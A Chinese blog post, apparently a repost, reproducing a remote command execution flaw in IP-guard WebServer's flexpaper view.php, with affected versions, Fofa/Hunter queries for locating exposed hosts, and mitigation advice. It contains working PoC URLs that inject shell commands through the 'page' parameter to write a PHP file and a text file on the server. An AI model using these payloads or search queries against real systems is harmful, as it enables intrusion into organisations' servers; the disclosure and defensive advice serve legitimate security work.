当前位置:   article > 正文

【IP-guard WebServer 远程命令执行漏洞复现(0day)】_ip-guard webserver 权限绕过漏洞

ip-guard webserver 权限绕过漏洞


一、漏洞说明

IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。
IP-guard Webserver远程命令执行漏洞(RCE)的问题,是因为旧版本申请审批的文件预览功能用到了一个开源的插件 flexpaper,使用的这个插件版本存在远程命令执行漏洞,新版本已不再使用 flexpaper。


二、影响版本

受影响的范围,即有使用文件预览功能的web系统

溢信科技 IP-guard<4.81.0307.0
  • 1

三、资产测绘

Fofa语法:
app="IP-guard"
Hunter语法:
web.title="IP-guard"
  • 1
  • 2
  • 3
  • 4

四、漏洞复现

1、来到web访问界面
在这里插入图片描述

2、bp抓包修改数据包
poc:

/ipg/static/appr/lib/flexpaper/php/view.php?doc=1.jpg&format=swf&isSplit=true&page=%7C%7Cecho+^%3C?php+phpinfo();+?^%3E+%3Esany.php
/ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+123456+>test.txt
  • 1
  • 2

在这里插入图片描述

/ipg/static/appr/lib/flexpaper/php/test.txt
  • 1

在这里插入图片描述
可执行写入的命令,可造成重大危害。


五、修复建议

临时防护方案:

1.加强系统和网络的访问控制,修改防火墙策略,不将非必要服务暴露于公网;
2.在公网部署的系统,通过WAF限制外网对"/ipg/static/appr/lib/flexpaper/php/view.php"路径的访问;
3.定期对服务器上的网站后门文件进行及时查杀。
  • 1
  • 2
  • 3

正式防护方案:

官方已修复该漏洞,建议用户更新到安全版本。
安全版本:
IP-guard WebServer >= 4.81.0307.0
下载链接:
https://www.ip-guard.net/
  • 1
  • 2
  • 3
  • 4
  • 5

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/不正经/article/detail/598385
推荐阅读
相关标签
  

闽ICP备14008679号